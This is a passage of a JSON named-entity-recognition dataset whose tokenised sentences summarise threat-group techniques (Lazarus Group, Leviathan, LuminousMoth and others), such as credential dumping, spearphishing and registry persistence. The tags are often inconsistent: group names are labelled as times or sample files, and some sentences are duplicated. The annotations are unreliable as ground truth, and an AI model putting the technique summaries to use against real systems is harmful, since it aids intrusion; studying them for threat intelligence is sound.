"O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "<code>net", "use</code>", "to", "identify", "and", "establish", "a", "network", "connection", "with", "a", "remote", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Various", "Lazarus", "Group", "malware", "enumerates", "logged-on", "users." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "rebooted", "systems", "after", "destroying", "files", "and", "wiping", "the", "MBR", "on", "infected", "systems." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Destover-like", "implant", "used", "by", "Lazarus", "Group", "can", "obtain", "the", "current", "system", "time", "and", "send", "it", "to", "the", "C2", "server." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Several", "Lazarus", "Group", "malware", "families", "use", "timestomping,", "including", "modifying", "the", "last", "write", "timestamp", "of", "a", "specified", "Registry", "key", "to", "a", "random", "date,", "as", "well", "as", "copying", "the", "timestamp", "for", "legitimate", ".exe", "files", "(such", "as", "calc.exe", "or", "mspaint.exe)", "to", "its", "dropped", "files." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "obtained", "a", "variety", "of", "tools", "for", "their", "operations,", "including", "Responder", "and", "PuTTy", "PSCP." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "administrator", "credentials", "to", "gain", "access", "to", "restricted", "network", "segments." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "VBA", "and", "embedded", "macros", "in", "Word", "documents", "to", "execute", "malicious", "code." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "conducted", "C2", "over", "HTTP", "and", "HTTPS." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Lazarus", "Group", "has", "hosted", "malicious", "downloads", "on", "Github." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "uses", "cmd.exe", "to", "execute", "commands", "on", "a", "compromised", "host.", "A", "Destover-like", "variant", "used", "by", "Lazarus", "Group", "uses", "a", "batch", "file", "mechanism", "to", "delete", "its", "binaries", "from", "the", "system." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "WMIC", "for", "discovery", "as", "well", "as", "to", "execute", "payloads", "for", "persistence", "and", "lateral", "movement." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Several", "Lazarus", "Group", "malware", "families", "install", "themselves", "as", "new", "services." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "leveraged", "the", "BatchEncryption", "tool", "to", "perform", "advanced", "batch", "script", "obfuscation", "and", "encoding", "techniques." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "leveraged", "dynamic", "DNS", "providers", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "I-Org", "B-Purp", "B-Org", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "dynamic", "DNS", "providers", "to", "create", "legitimate-looking", "subdomains", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "I-Org", "B-Purp", "B-Org", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "had", "downloaded", "additional", "tools", "to", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "JavaScript", "in", "its", "attacks." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "B-OffAct" ] }, { "tokens": [ "LazyScripter", "has", "lured", "users", "to", "open", "malicious", "email", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "LazyScripter", "has", "relied", "upon", "users", "clicking", "on", "links", "to", "malicious", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "a", "variety", "of", "open-source", "remote", "access", "Trojans", "for", "its", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "several", "different", "security", "software", "icons", "to", "disguise", "executables." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "LazyScripter", "has", "used", "`mshta.exe`", "to", "execute", "Koadic", "stagers." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "PowerShell", "scripts", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "achieved", "persistence", "via", "writing", "a", "PowerShell", "script", "to", "the", "autorun", "registry", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "`rundll32.exe`", "to", "execute", "Koadic", "stagers." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "spam", "emails", "weaponized", "with", "archive", "or", "document", "files", "as", "its", "initial", "infection", "vector." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "spam", "emails", "that", "contain", "a", "link", "that", "redirects", "the", "victim", "to", "download", "a", "malicious", "document." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "hosted", "open-source", "remote", "access", "Trojans", "used", "in", "its", "operations", "in", "GitHub." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "VBScript", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "GitHub", "to", "host", "its", "payloads", "to", "operate", "spam", "campaigns." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "LazyScripter", "has", "established", "GitHub", "accounts", "to", "host", "its", "toolsets." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LazyScripter", "has", "used", "batch", "files", "to", "deploy", "open-source", "and", "multi-stage", "RATs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Leafminer", "used", "several", "tools", "for", "retrieving", "login", "and", "password", "information,", "including", "LaZagne." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Leafminer", "obfuscated", "scripts", "that", "were", "used", "on", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leafminer", "used", "several", "tools", "for", "retrieving", "login", "and", "password", "information,", "including", "LaZagne." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Leafminer", "used", "several", "tools", "for", "retrieving", "login", "and", "password", "information,", "including", "LaZagne." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Leafminer", "used", "several", "tools", "for", "retrieving", "login", "and", "password", "information,", "including", "LaZagne." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Leafminer", "has", "infected", "victims", "using", "watering", "holes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Leafminer", "used", "a", "tool", "called", "MailSniper", "to", "search", "for", "files", "on", "the", "desktop", "and", "another", "utility", "called", "Sobolsoft", "to", "extract", "attachments", "from", "EML", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leafminer", "infected", "victims", "using", "JavaScript", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leafminer", "used", "several", "tools", "for", "retrieving", "login", "and", "password", "information,", "including", "LaZagne." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Leafminer", "used", "several", "tools", "for", "retrieving", "login", "and", "password", "information,", "including", "LaZagne", "and", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Leafminer", "used", "a", "tool", "called", "Imecab", "to", "set", "up", "a", "persistent", "remote", "access", "account", "on", "the", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leafminer", "scanned", "network", "services", "to", "search", "for", "vulnerabilities", "in", "the", "victim", "system." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leafminer", "used", "a", "tool", "called", "Total", "SMB", "BruteForcer", "to", "perform", "internal", "password", "spraying." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Tool", "I-Tool", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leafminer", "has", "used", "Process", "Doppelgänging", "to", "evade", "security", "software", "while", "deploying", "tools", "on", "compromised", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Leafminer", "used", "a", "tool", "called", "MailSniper", "to", "search", "through", "the", "Exchange", "server", "mailboxes", "for", "keywords." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Leafminer", "used", "Microsoft’s", "Sysinternals", "tools", "to", "gather", "detailed", "information", "about", "remote", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Leafminer", "has", "obtained", "and", "used", "tools", "such", "as", "LaZagne,", "Mimikatz,", "PsExec,", "and", "MailSniper." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Leviathan", "has", "archived", "victim's", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "BITSAdmin", "to", "download", "additional", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "inserted", "garbage", "characters", "into", "code,", "presumably", "to", "avoid", "anti-virus", "detection." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "stolen", "code", "signing", "certificates", "to", "sign", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-OffAct", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "collected", "compromised", "credentials", "to", "use", "for", "targeting", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "a", "DLL", "known", "as", "SeDll", "to", "decrypt", "and", "execute", "other", "JavaScript", "backdoors." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Leviathan", "has", "established", "domains", "that", "impersonate", "legitimate", "entities", "to", "use", "for", "targeting", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "infected", "victims", "using", "watering", "holes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Leviathan", "has", "utilized", "OLE", "as", "a", "method", "to", "insert", "malicious", "content", "inside", "various", "phishing", "documents." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Leviathan", "has", "utilized", "techniques", "like", "reflective", "DLL", "loading", "to", "write", "a", "DLL", "into", "memory", "and", "load", "a", "shell", "that", "provides", "backdoor", "access", "to", "the", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Way", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "compromised", "email", "accounts", "to", "conduct", "social", "engineering", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "I-OffAct", "I-OffAct", "O" ] }, { "tokens": [ "Leviathan", "has", "created", "new", "email", "accounts", "for", "targeting", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "obfuscated", "code", "using", "base64", "and", "gzip", "compression." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Leviathan", "has", "exfiltrated", "data", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "an", "uploader", "known", "as", "LUNCHMONEY", "that", "can", "exfiltrate", "files", "to", "Dropbox." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile", "B-Purp", "O", "B-Way" ] }, { "tokens": [ "Leviathan", "has", "exploited", "multiple", "Microsoft", "Office", "and", ".NET", "vulnerabilities", "for", "execution,", "including", "CVE-2017-0199,", "CVE-2017-8759,", "and", "CVE-2017-11882." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Exp", "I-Exp", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Leviathan", "has", "used", "external", "remote", "services", "such", "as", "virtual", "private", "networks", "(VPN)", "to", "gain", "initial", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Leviathan", "has", "downloaded", "additional", "scripts", "and", "files", "from", "adversary-controlled", "servers." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "conducted", "internal", "spearphishing", "within", "the", "victim's", "environment", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "publicly", "available", "tools", "to", "dump", "password", "hashes,", "including", "ProcDump", "and", "WCE." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Leviathan", "has", "used", "C:\\Windows\\Debug", "and", "C:\\Perflogs", "as", "staging", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "sent", "spearphishing", "attachments", "attempting", "to", "get", "a", "user", "to", "click." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "sent", "spearphishing", "email", "links", "attempting", "to", "get", "a", "user", "to", "click." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "multi-hop", "proxies", "to", "disguise", "the", "source", "of", "their", "malicious", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "publicly", "available", "tools", "to", "dump", "password", "hashes,", "including", "HOMEFRY." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Leviathan", "has", "received", "C2", "instructions", "from", "user", "profiles", "created", "on", "legitimate", "websites", "such", "as", "Github", "and", "TechNet." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Leviathan", "has", "used", "PowerShell", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "protocol", "tunneling", "to", "further", "conceal", "C2", "communications", "and", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Idus", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "JavaScript", "to", "create", "a", "shortcut", "file", "in", "the", "Startup", "folder", "that", "points", "to", "its", "main", "backdoor." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "regsvr32", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "staged", "data", "remotely", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "targeted", "RDP", "credentials", "and", "used", "it", "to", "move", "through", "the", "victim", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "used", "ssh", "for", "internal", "reconnaissance." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "JavaScript", "to", "create", "a", "shortcut", "file", "in", "the", "Startup", "folder", "that", "points", "to", "its", "main", "backdoor." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "compromised", "social", "media", "accounts", "to", "conduct", "social", "engineering", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "I-OffAct", "I-OffAct", "O" ] }, { "tokens": [ "Leviathan", "has", "created", "new", "social", "media", "accounts", "for", "targeting", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "sent", "spearphishing", "emails", "with", "malicious", "attachments,", "including", ".rtf,", ".doc,", "and", ".xls", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Leviathan", "has", "sent", "spearphishing", "emails", "with", "links,", "often", "using", "a", "fraudulent", "lookalike", "domain", "and", "stolen", "branding." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "steganography", "to", "hide", "stolen", "data", "inside", "other", "files", "stored", "on", "Github." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "obtained", "valid", "accounts", "to", "gain", "initial", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "VBScript." ], "ner_tags": [ "B-Idus", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "relies", "on", "web", "shells", "for", "an", "initial", "foothold", "as", "well", "as", "persistence", "into", "the", "victim's", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "WMI", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Leviathan", "has", "used", "WMI", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "ARP", "spoofing", "to", "redirect", "a", "compromised", "machine", "to", "an", "actor-controlled", "website." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "manually", "archived", "stolen", "files", "from", "victim", "machines", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "signed", "their", "malware", "with", "a", "valid", "digital", "signature." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "legitimate", "executables", "such", "as", "`winword.exe`", "and", "`igfxem.exe`", "to", "side-load", "their", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "split", "archived", "files", "into", "multiple", "parts", "to", "bypass", "a", "5MB", "limit." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "collected", "files", "and", "data", "from", "compromised", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "a", "valid", "digital", "certificate", "for", "some", "of", "their", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "redirected", "compromised", "machines", "to", "an", "actor-controlled", "webpage", "through", "HTML", "injection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "malware", "that", "exfiltrates", "stolen", "data", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "exfiltrated", "data", "to", "Google", "Drive." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "malware", "that", "scans", "for", "files", "in", "the", "Documents,", "Desktop,", "and", "Download", "folders", "and", "in", "other", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "malware", "to", "store", "malicious", "binaries", "in", "hidden", "directories", "on", "victim's", "USB", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "downloaded", "additional", "malware", "and", "tools", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "created", "a", "link", "to", "a", "Dropbox", "file", "that", "has", "been", "used", "in", "their", "spear-phishing", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "LuminousMoth", "has", "lured", "victims", "into", "clicking", "malicious", "Dropbox", "download", "links", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "LuminousMoth", "has", "used", "unique", "malware", "for", "information", "theft", "and", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "B-Purp" ] }, { "tokens": [ "LuminousMoth", "has", "obtained", "and", "used", "malware", "such", "as", "Cobalt", "Strike." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "LuminousMoth", "has", "disguised", "their", "exfiltration", "malware", "as", "`ZoomVideoApp.exe`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "LuminousMoth", "has", "used", "malware", "that", "adds", "Registry", "keys", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "malicious", "DLLs", "that", "setup", "persistence", "in", "the", "Registry", "Key", "`HKCU\\Software\\Microsoft\\Windows\\Current", "Version\\Run`." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "malicious", "DLLs", "to", "spread", "malware", "to", "connected", "removable", "USB", "drives", "on", "infected", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "created", "scheduled", "tasks", "to", "establish", "persistence", "for", "their", "tools." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "sent", "spearphishing", "emails", "containing", "a", "malicious", "Dropbox", "download", "link." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "an", "unnamed", "post-exploitation", "tool", "to", "steal", "cookies", "from", "the", "Chrome", "browser." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "used", "a", "malicious", "DLL", "to", "collect", "the", "username", "from", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "obtained", "an", "ARP", "spoofing", "tool", "from", "GitHub." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", 